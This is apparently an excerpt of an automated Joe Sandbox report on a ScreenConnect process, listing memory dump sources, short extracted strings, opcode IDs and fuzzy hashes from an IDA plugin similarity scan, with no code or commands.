                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: nCuq
                                                                                                                                                                                                                                          • API String ID: 0-4247494828
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (aq
                                                                                                                                                                                                                                          • API String ID: 0-600464949
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: {'
                                                                                                                                                                                                                                          • API String ID: 0-2381349322
                                                                                                                                                                                                                                          • Opcode ID: cef627909ff2889ec73d754aa5728d05f459676ae3fd912dc2afca3c3cfb0796
                                                                                                                                                                                                                                          • Instruction ID: 11595ae2ceb48ab6a8770ede9eac9d403b5b517ce219631ecb911d115eedd0b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cef627909ff2889ec73d754aa5728d05f459676ae3fd912dc2afca3c3cfb0796
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD41D0B1B012014FD706EB7DA8A085EBBA6FFC9650304456ED409EB355EF78AD09C7D1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LR]q
                                                                                                                                                                                                                                          • API String ID: 0-3081347316
                                                                                                                                                                                                                                          • Opcode ID: 2d0bed4b283eb04cf563fdf92561ef6c03cac8a2b7d865c44b751a9321d70918
                                                                                                                                                                                                                                          • Instruction ID: a689c1450eaf25b562fadcb9a5d5818b48e051140a7c7ef773c14952c8cec976
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d0bed4b283eb04cf563fdf92561ef6c03cac8a2b7d865c44b751a9321d70918
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C241C470B053499FDF268F60E4A42EE7FB2EF89708F14405BE40597392DA755D06CB51
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 3]n^
                                                                                                                                                                                                                                          • API String ID: 0-4019350163
                                                                                                                                                                                                                                          • Opcode ID: 8c18b1b5c7210b7ec84b4c6f8733cecd741f8c24ee0a4969f89b5cd4618be0d7
                                                                                                                                                                                                                                          • Instruction ID: 95731c364258006f18e12c125a62f9b902933fe472d4022366e76538703f4f01
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c18b1b5c7210b7ec84b4c6f8733cecd741f8c24ee0a4969f89b5cd4618be0d7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3313D34B106068BDF14DBA9C99056EF7F5FFC9214B10846BD50AE7368DB74EC058792
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: {'
                                                                                                                                                                                                                                          • API String ID: 0-2381349322
                                                                                                                                                                                                                                          • Opcode ID: 91ab6d4919c522eb8b626ba8c56379c622a63a826b7adbf98917a3c1047d050d
                                                                                                                                                                                                                                          • Instruction ID: 1473554db0ca1e960c703926a27920bd95e71ca13eb245e08789502aca0bc496
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91ab6d4919c522eb8b626ba8c56379c622a63a826b7adbf98917a3c1047d050d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2731C371B002064BD715EB7DA89085EBBEAFFC86503108A2ED509EB354EF74ED098BD1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                          • API String ID: 0-3372436214
                                                                                                                                                                                                                                          • Opcode ID: 26f7a96fbeb374958aac6cc501db3e2e8989c0f5af08aaf5055627ee123f4454
                                                                                                                                                                                                                                          • Instruction ID: a33473f528a40441f67f9657a93a6c90d2037fb9b277540269f1270914211bf4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26f7a96fbeb374958aac6cc501db3e2e8989c0f5af08aaf5055627ee123f4454
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D31C135E006448FDF14CB68D964ADEBFF1FF8A300F1544AAD146AB362DA34AC46CB51
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3300604123.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_6350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: `Q]q
                                                                                                                                                                                                                                          • API String ID: 0-1594560043
                                                                                                                                                                                                                                          • Opcode ID: 82971101c56fdca34e3a3ad19dc355c4ce5ee1a7a49d271c4ca4af54df6c5d5d
                                                                                                                                                                                                                                          • Instruction ID: 4a812b39e2978bf86f7f7631f2195fc5b9d68f04124d3258dc555b27803a5c27
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82971101c56fdca34e3a3ad19dc355c4ce5ee1a7a49d271c4ca4af54df6c5d5d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9313570E00208DFDB54DFA9D944BEEBBB6AF88304F148429E805AB350DBB96845CF91
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LR]q
                                                                                                                                                                                                                                          • API String ID: 0-3081347316
                                                                                                                                                                                                                                          • Opcode ID: dda1732dfa6a9e34778b7f91d6b02df61797813798e4cd68282b9deace5e370b
                                                                                                                                                                                                                                          • Instruction ID: 9a44445a37c4b5b55f57750356ec9cb83666f56b2523feab090e0c869e82563e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dda1732dfa6a9e34778b7f91d6b02df61797813798e4cd68282b9deace5e370b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4531C770F012099FDF25CF64E4A87AE7BB2BF88719F24402AE406A7395DB706D02CB51
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LR]q
                                                                                                                                                                                                                                          • API String ID: 0-3081347316
                                                                                                                                                                                                                                          • Opcode ID: da72ee79f56dc5825508d4837011b877248d2cabe2b210ef9a7248499a1d6a2f
                                                                                                                                                                                                                                          • Instruction ID: 6705f7b011503d876d2e71a2b868bf2b0e4ae2ba3305c2227f2f575e556ad914
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da72ee79f56dc5825508d4837011b877248d2cabe2b210ef9a7248499a1d6a2f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B621D871B102049BDB289F65C899BBEBFB6FBC8700F18442DE406E7296EE759C01C791
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LR]q
                                                                                                                                                                                                                                          • API String ID: 0-3081347316
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 22a6716e2ced84704328e7a72629de700fbe8b4a92237398313fb42f7397a90a
                                                                                                                                                                                                                                          • Instruction ID: b902c7ad574c8718e04c8663d9a3f4ffc34b8a89bd9afb68b38120df2cae5459
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22a6716e2ced84704328e7a72629de700fbe8b4a92237398313fb42f7397a90a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F41E2707402015BDB059F39D8A0A2EBBA6FFC9644B08C92BC4059F356EF74EC06C792
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 82e78618346f7c46cd6e4fcd406afea03eddbee7517cacc90026286323a42818
                                                                                                                                                                                                                                          • Instruction ID: 39a680cb466e02c2d84115e0c7e7c4e3bd0ea1ed43be1791009b80263fee97fa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82e78618346f7c46cd6e4fcd406afea03eddbee7517cacc90026286323a42818
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85513C307007018FDB24DF29D99495AB7F6FF893147148A6AD496DB7A8E770F805CB90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 70264b3028a649581f504c575aa865c5017a58bfe1c0cdf71f5212ee0e3f4ae5
                                                                                                                                                                                                                                          • Instruction ID: 1e26993c2e742a8fad85d23267d09c5c5a75cd62679dfad7452931d86bb807f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70264b3028a649581f504c575aa865c5017a58bfe1c0cdf71f5212ee0e3f4ae5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92510930600A01CFD734CF69D584956BBF2FF89364B244A5DE49A9B7A4DB31F806CB84
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 81222c905ffdf352ff2663fc8dccdb684c6549bf33ade800e1a033d7dd3fbf20
                                                                                                                                                                                                                                          • Instruction ID: 7801add6fe95b1f629c366753f37392ed24f49523890da28c91741e74f214895
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81222c905ffdf352ff2663fc8dccdb684c6549bf33ade800e1a033d7dd3fbf20
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8519F70E403099FDB05DFB8E854B9DBBB5FF89300F108969E404AB265DB74A945CFA0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c635619ae27a8effdbefef6fc72af474aeaa8f653bedc74f2d967a771247e715
                                                                                                                                                                                                                                          • Instruction ID: b83332e334753e30b2d6f6706cc7f51b703621da4abac9aa613122cdf59f23d0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c635619ae27a8effdbefef6fc72af474aeaa8f653bedc74f2d967a771247e715
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44516E70E403099FDB04DFA8E854BDDBBB5FF89300F108959E404AB265EB74A946CF90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 923e53c660c1f9e6441a6b1dd8dca56a93dedad30e6ced75b70a48b55d276668
                                                                                                                                                                                                                                          • Instruction ID: 77dcf37cf44df65689bb428c208a8002398b365556e9b86f4cb8748a7504942e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 923e53c660c1f9e6441a6b1dd8dca56a93dedad30e6ced75b70a48b55d276668
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7641D8706007018FDB34DF29D8A4A26B7F1BF89315B144A69D596DB7A4EB30F806CF81
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 65a12624d13529441724a03d8b47fc4e8a4ccbfc0631d514c7417d6f57ff6046
                                                                                                                                                                                                                                          • Instruction ID: d1bf3b808a8aae99d99a076a6b9b0469942b6ee5d2759be40d1e3cc8ceae8056
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65a12624d13529441724a03d8b47fc4e8a4ccbfc0631d514c7417d6f57ff6046
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22415071E0021ADBEB14DFA9C880ADEBFB5EF88700F148129E509B7340DB75AD46CB91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 254400652f84c4607a083023bc5fbb953ae51e4cbf089b975bb2dd457d4b7c0a
                                                                                                                                                                                                                                          • Instruction ID: a9c388d59af351170d5eb8f7459911b369acedc25a7df4a618d878dfc1ddaf6a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 254400652f84c4607a083023bc5fbb953ae51e4cbf089b975bb2dd457d4b7c0a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A411D707007018FDB24CF29D894A1ABBF6FF89364B148659D496DB7A5EB30F846CB50
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1f7db785846e284f2e53a5a9f81b47c8c110d5bfa53cfeca4f3fac762ec9a49c
                                                                                                                                                                                                                                          • Instruction ID: 442cbd2eac78035ef772460c6f248c86c6253bc9bed8ed2dd5505d5fa58719b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f7db785846e284f2e53a5a9f81b47c8c110d5bfa53cfeca4f3fac762ec9a49c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8318F31F102058FEB14AFA9C454AAEFBF5EF89254F04846AE406E7364DB36DD018B90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 26b369c38beb73a189905a21847fe22d1fc30977d03537751a7070c543b6559e
                                                                                                                                                                                                                                          • Instruction ID: e3240501c64f4008126a204f3501db713d71aafd21459aae02b9cf0ae664c4da
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26b369c38beb73a189905a21847fe22d1fc30977d03537751a7070c543b6559e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B415830B102019FDB28DF69D854AAEBBF6FF88614B14456DE406EB3A4DF75AC04CB90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3300604123.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_6350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 892115f4e61396e84cae199dffee2f5133701f1fcbc74674335f6e51394289df
                                                                                                                                                                                                                                          • Instruction ID: 5c60f3166644cad46d1ba90b1dfee8ea4910392ad1c5f27cc55a8f9e09f4c53a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 892115f4e61396e84cae199dffee2f5133701f1fcbc74674335f6e51394289df
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E316935B002159FCB54EF7CC49466E76E6AFC8250B644039E80AEB354EF39DD028BD1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6c46eb74cb8f9ad98f67e4cfee3bea535e89ed3045dfac960fbd563b5506f98a
                                                                                                                                                                                                                                          • Instruction ID: e20ac10ea6ed04be9ae2849ee79753123b7747c13a1994ffe0da9ad28e3c8ba3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c46eb74cb8f9ad98f67e4cfee3bea535e89ed3045dfac960fbd563b5506f98a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C2124A690D7C09FD356CB2898A59D17F21FF5321070A80CBE484CF2A3E5299803C766
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3d310c367268708e6c32b1e5c482c7926e5d7717b5c2d4818722ea41522cf076
                                                                                                                                                                                                                                          • Instruction ID: 6d8d507f88ac322548b1626e3ea3ccb524122045abf91f421f53a47081ff7e1e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d310c367268708e6c32b1e5c482c7926e5d7717b5c2d4818722ea41522cf076
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD316E747006018FCB24DF68D8A456AB7F1FF89314B104A6AD586DB7A4E731F806CB41
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 89ba0c79ec98ffec12b12c9b67eb57deef2d75444c91d34617becb674de4e366
                                                                                                                                                                                                                                          • Instruction ID: 4ea3d950245b8ba0148449e74f13772fb9e00b717c71047aaf2a53eaf989b211
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89ba0c79ec98ffec12b12c9b67eb57deef2d75444c91d34617becb674de4e366
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17316C70A00B018FD730CF69C888666BBF1EF95320B144B2DD1929B6A5D731E94ACF84
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8af7fe4cb5e403cc672ebd9fe27cc5b288d2370d028371204f742758f393dad1
                                                                                                                                                                                                                                          • Instruction ID: 79feac2c45baddfcb0f61922af270a823bc2c691e3cb5c22ed9174ee7d0d771b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8af7fe4cb5e403cc672ebd9fe27cc5b288d2370d028371204f742758f393dad1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C53189B1D002099FCB14DFAAC444AEEFFF5EF88320F10846AD558A7250D779A546CFA0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ffa1ccb2876b0090fbd21d1d85d4744a4fa9a54a92160151e9a98f167fdcb429
                                                                                                                                                                                                                                          • Instruction ID: a6726b9177f3a3f6000db531434d70463319f4afd90093a26562d84fe2d45502
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffa1ccb2876b0090fbd21d1d85d4744a4fa9a54a92160151e9a98f167fdcb429
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8310A306007018FCB38DF29E89865ABBF5FF85711B144A2EE466C76E4DB70E949DB90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 85f5207f1b20ba959022f41812807d62d1322790a96538659c855202f5fd3273
                                                                                                                                                                                                                                          • Instruction ID: d7ad190ed6e6b455b89d0c4b5d177d8185d10c33fd752c39e9ee088e66912dba
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85f5207f1b20ba959022f41812807d62d1322790a96538659c855202f5fd3273
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B421046190D3C14FD30ADB289895996FF69FB83214F1AC0DFD485CF1A3D6289807C762
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
